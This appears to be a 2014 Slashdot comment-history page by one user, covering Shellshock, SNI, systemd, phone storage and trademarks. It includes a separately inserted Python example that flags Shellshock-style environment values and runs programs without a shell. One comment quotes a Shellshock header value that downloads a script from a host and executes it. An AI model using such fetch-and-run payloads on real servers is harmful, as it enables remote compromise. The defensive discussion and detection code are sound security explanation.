
Comment: Re:Now how about the third party ad networks (Score 1) 66

by squiggleslash (#48026031) Attached to: CloudFlare Announces Free SSL Support For All Customers

Looking at the Wikipedia page, the two EOL'd environments that stand out are:

- Android browser on Gingerbread (and older) - hopefully this'll be solved soon, Gingerbread is finally disappearing but it's taken a while.
- Internet Explorer on Windows XP.

Everything else seems to be the kind of environment where if you're still using a browser that cannot support SNI then you're probably running into all kinds of problems anyway.

(I would like to think that Windows XP users are using Firefox these days, but...)

Question: aren't there privacy issues associated with SNI? http://tools.ietf.org/html/rfc... shows no attempt to munge the server name. So even though a third party might not be able to determine what content you're trying to access, they probably can intercept - albeit with the victim experiencing an interruption in service - the hostname and determine whose content you're trying to view.

Comment: Re:Can someone explain how someone is exploited? (Score 3, Interesting) 326

by squiggleslash (#48019297) Attached to: Bash To Require Further Patching, As More Shellshock Holes Found

Kinda. With "Mark 2" it becomes considerably more difficult, as you have to find a way to set an environment variable to the same name as a command that'll be executed - at least, from the proof of concept exploits I'm seeing. So even if a badly configured webserver sets HTTP_HOST to "() { wget http://192.168.0.1/r00t.sh ; chmod +x r00t.sh; ./r00t.sh; }", unless your script actually tries to run a program called HTTP_HOST it shouldn't be called.

(If I'm wrong, expecting angry flames now ;-) Please though include details of why.)

Comment: Re:Issue with FSF statement... (Score 2) 208

by squiggleslash (#48009263) Attached to: Apple Yet To Push Patch For "Shellshock" Bug

I suspect large numbers of people saw the bug, but didn't realize the implications and took no action knowing that the last thing you want to do with a programming language (which a shell like a Bourne implementation implements) is change what constitutes valid code.

What does this mean? Unsure. It's always been bad practice to use system() or similar calls to start other apps. What this issue has revealed is not so much that bash has a bug in it, but that rather too many applications rely upon bash and shouldn't. Bash is always a vector, and writing code that calls it already means working a great deal on input validation exercises that risk failure.

The scary part is that a significant amount of the *ix community doesn't care - they call system() anyway, or blindly allow the shell environment to be modified, without asking themselves whether this is a good idea.

Comment: Re:Full Disclosure can be found on oss-security... (Score 1) 399

by squiggleslash (#48008409) Attached to: Remote Exploit Vulnerability Found In Bash

One thing missing in all of this is how do I exploit it? In the example you give, that's not clear.

So far as I can determine, the only time this is going to be exploited is if you have some way of manipulating the environment of the shell. I can't think of a CGI variable that's directly set to the content of something the caller has enough control over; pretty much all of them are munged, have mandatory punctuation incompatible with use as a function placed at the beginning, or are impossible to put parentheses and punctuation in.

Perhaps I'm wrong. But I'm inclined to think the entire thing is overblown for two reasons. First, the difficulty of setting the environment in the first place, and secondly the fact that making system() calls, etc, is always a red flag for those checking for security holes (and is rare and usually unnecessary) because of the other potential issues with calling a program that literally has direct control over a substantial amount of your computer.

Which is not to say that, for example, the DHCP exploit that's been mentioned isn't terrifying, but even that... why the hell does the DHCPD client, by default, allow the environment to be changed via an insecure DHCP environment anyway?
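The three Shellshock comments above turn on the same two questions: how request data reaches a shell's environment at all, and why calling out through a shell is the real problem. The following is an added example, not code from any of the comments or from bash, that shows both from the defender's side. It mimics the CGI header-to-HTTP_* mapping (RFC 3875 is the assumed convention), flags environment values shaped like bash's exported-function marker so they can be logged, and runs a child program directly rather than through a shell with an explicitly scrubbed environment. All header values are constructed samples; the X-Probe value is the inert function-definition shape and nothing here ever hands it to a shell.

```python
import os
import re
import subprocess
import sys

# Constructed sample request headers, as a CGI gateway would receive them.
# X-Probe carries the "() {" shape bash keyed on when importing functions
# from the environment; it is inert here because no shell ever parses it.
SAMPLE_HEADERS = {
    "Host": "example.test",
    "User-Agent": "Mozilla/5.0 (constructed sample)",
    "X-Probe": "() { :; }; /bin/echo constructed-marker",
}


def cgi_environment(headers, base_env):
    """Map request headers onto HTTP_* variables the way a CGI gateway does
    (assumed RFC 3875 style: upper-case, '-' becomes '_', HTTP_ prefix).
    This is the step that lets a remote caller choose a variable's *value*,
    which is all the original bug needed; the variable *name* did not matter."""
    env = dict(base_env)
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


# The exported-function marker: "()" then "{" at the start of the value.
FUNCTION_EXPORT_RE = re.compile(r"^\s*\(\)\s*\{")


def flag_function_exports(env):
    """Names of variables whose value is shaped like an exported bash function.
    Suitable as a log or request-filter detection rule; it is a signal for
    monitoring, not a substitute for patching bash."""
    return sorted(k for k, v in env.items() if FUNCTION_EXPORT_RE.match(v))


def run_without_shell(argv, env):
    """Run a program directly (shell=False, argv as a list) with a scrubbed
    environment, so request-derived values never reach a shell parser."""
    suspicious = set(flag_function_exports(env))
    clean = {k: v for k, v in env.items() if k not in suspicious}
    proc = subprocess.run(argv, env=clean, shell=False,
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def demo():
    """Build the CGI environment from the sample headers, run a child that
    reports whether HTTP_X_PROBE reached it, and return (flagged, report)."""
    base = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}
    env = cgi_environment(SAMPLE_HEADERS, base)
    flagged = flag_function_exports(env)
    child = [sys.executable, "-c",
             "import os; print(os.environ.get('HTTP_X_PROBE', 'absent'))"]
    return flagged, run_without_shell(child, env)


if __name__ == "__main__":
    print(demo())
```

The child is started with an argument list and shell=False, which is the general fix the second comment is reaching for: the program you intend to run is executed directly, and no shell gets to interpret either the command line or the environment. Scrubbing the flagged variables is defence in depth on top of that, and passing an explicit base environment instead of inheriting the gateway's closes the path through which the DHCP client case lets the network set variables.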

Comment: Re:kill -1 (Score 2) 469

by squiggleslash (#47960039) Attached to: Fork of Systemd Leads To Lightweight Uselessd

Must admit that's news to me. Kinda fed up of the subtle changes to shell commands we've seen over the last few years especially as this one conflicts with the kill -{SIGNAL} syntax we're used to.

Either way, this sounds like a non-issue. (1) if we're routinely trying to determine how to kill EVERY CORE PROCESS ON THE SYSTEM then we have bigger fish to fry than whether init/systemd is capable of working with that.

(2) It sounds scriptable to me, assuming systemd itself isn't capable of doing it. /proc should give you all the information you need.

I worry that this is the kind of concern holding back adoption of systemd. Good reasons I understand. Bad ones, that seek to blame systemd for major system problems that exist under init too, are bad.

Comment: Re:Memory doesn't cost that much. (Score 1) 262

by squiggleslash (#47958289) Attached to: Why the iPhone 6 Has the Same Base Memory As the iPhone 5

I agree Google shouldn't have omitted the SD card slot from their Nexus series. It's one of many reasons I'll never buy a Nexus device again.

Nobody here is talking about swapping SD cards constantly. What's being talked about is not caring about the capacity of the device you buy. You store apps on the device as there's more than enough space even when they have tiny amounts of memory like 16GB. You store data on one, single, micro SD card. When you run out of space on your micro SD card, you buy a bigger one and copy your data to that.

That way, upgrading your phone is just a matter of swapping the SIM and SD cards. Your data follows you. It "just works". Rather than the inordinately stupid idea, popularized by Apple and slavishly copied by Google, of copying all your data across from one device to the other, either directly, or via the cloud, all umpteen gigabytes of it. That's ridiculous, that's absurd, and manufacturers should recognize that's a massive inconvenience nobody wants.

Comment: Re:A non-UNIX OS in a UNIX world? (Score 1) 545

by squiggleslash (#47935767) Attached to: What To Expect With Windows 9

I wish Microsoft wasn't the only one.

Part of the reason geeks love *ix is because right now the alternative is Windows, and *ix matured rather better than the odd combination of technologies (an API and application model with its roots in Windows 1.0 coupled with a nice-ish kernel with inspiration from the unholy combination of VMS and the 1980s microkernel movement) that's called Windows today.

Throughout my life I've used a variety of different platforms, though the ability to choose something different dried up in the mid-nineties as one by one the alternatives either went bankrupt or became obsolete. Some - at the time I was using them, not now - felt more comfortable, flexible, and ultimately more usable, than *ix. AmigaOS 2.04+ (especially augmented with the GCC tools) would be an example (again, NOT NOW, THEN.) Others, like VMS, were ugly, and horrendous to use or program, but they were still valuable in terms of providing wonderful ideas that, alas, we've ignored since - VMS itself had generic job queues, indexed files right in the file system, a shell that didn't blindly execute files with the same name as a command you'd typed, security based upon roles and permissions, networking built into the file system (think if you could type "cat header.html scp://otherhost/home/squiggleslash/main.html footer.html > blah.html" - that's roughly what I'm talking about), all unfortunately crippled by some clumsy design decisions and a reliance on proprietary hardware.

*ix is great, but for those who've experienced more than Unix and Windows, it's... well, it's kind of like we settled. You know that couple who knew each other at high school, and then after a 20 year absence got married at 40? And they seem OK, but you realize both are bored, and both married because they felt like they were running out of options?

That's us and *ix.

Comment: Re:Good (Score 1) 323

by squiggleslash (#47925799) Attached to: Say Goodbye To That Unwanted U2 Album

Wait, iPhones autoplay music? As in, not only did Apple push the unwanted album to phones, but they then set up the iPhone to play it at full blast whenever you were nearby, forcing you to listen to it?

If that's the case, then that has been left out of the widespread news coverage of the story, which has just concentrated on the "Being uploaded to phones that were set up to automatically download new purchases", which most of us consider a minor inconvenience, if that.

Comment: Re:Lucky them (Score 1) 159

by squiggleslash (#47925323) Attached to: Court Rules the "Google" Trademark Isn't Generic

The results I get seem to be mostly people trying to come up with clever blog titles, not actually cases where someone innocently said "Well, I googled what you asked for, and Bing gave me over a gajillion results."

Indeed, I suspect there are multiple levels here. If someone tells me to "Go google something", I may use Bing in my quest to research whatever it is I've been asked to look up. OTOH, if I say "Well, I googled it, and found...", it'll generally be the case that I'm saying I actually used Google.

Comment: Re:If there was only one viable choice ... (Score 1) 159

by squiggleslash (#47925305) Attached to: Court Rules the "Google" Trademark Isn't Generic

Pro-tip, which I learned recently: Google has actually a hidden (well, obscure, it's there but there's no reason you'd think it does what it does) option that means "Just give me the results using the algorithms you used back when Google was useful." Search Tools -> (All Results) : Verbatim.

No, you can't make it a default. They track that you're probably male, probably interested in tech, and that you'd be a good person to present ads for spiked leather underpants to, but they don't track that you actually want useful search engine results. Sigh.

Comment: Re:Well, if you're going to push... (Score 1) 159

by squiggleslash (#47925247) Attached to: Court Rules the "Google" Trademark Isn't Generic

I'm in my forties, and I don't recall anyone ever using the term "Xerox". I've heard it used as an example of someone using a trademark generically, but not actually seen that occur in practice.

Same, BTW, goes for Kleenex. Everyone I know, since the dawn of time, has said "tissue".

Coke and Tylenol, yeah. But not Xerox or Kleenex.
